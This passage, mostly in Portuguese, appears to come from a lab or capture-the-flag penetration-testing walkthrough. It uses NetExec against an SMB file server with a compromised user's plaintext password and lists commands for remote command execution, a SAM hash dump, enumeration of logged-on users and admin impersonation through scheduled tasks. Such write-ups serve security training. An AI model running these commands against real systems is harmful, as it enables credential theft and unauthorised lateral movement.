File Server
Considerando que nosso usuário recém-comprometido tem algumas permissões especiais neste grupo de domínio, podemos revisitar o servidor de arquivos como esse novo usuário.
nxc smb 10.0.29.208 -u "benjaminm" -p "w5gzI6&xx%aBqZC^GZ"
Podemos fornecer comandos arbitrários que queremos executar com o
-X
argumento. Vamos até validar que estamos de fato no grupo de administradores locais verificando a saída do comando:
nxc smb 10.0.29.208 -u "benjaminm" -p "w5gzI6&xx%aBqZC^GZ" -X 'net localgroup Administrators'
Portanto, nada nos impede de usar outras ferramentas úteis
NetExec
. Podemos até mesmo vasculhar o banco de dados SAM para encontrar mais hashes para crackear!
nxc smb 10.0.29.208 -u "benjaminm" -p "w5gzI6&xx%aBqZC^GZ" --sam
Existe até a possibilidade de procurar usuários logados, o que pode nos levar à próxima migalha de pão e peça do quebra-cabeça!
nxc smb 10.0.29.208 -u "benjaminm" -p "w5gzI6&xx%aBqZC^GZ" --loggedon-users
Impersonating an Admin
nxc smb 10.0.29.208 -u "benjaminm" -p "w5gzI6&xx%aBqZC^GZ" -M schtask_as -o USER=johna CMD=whoami
Last updated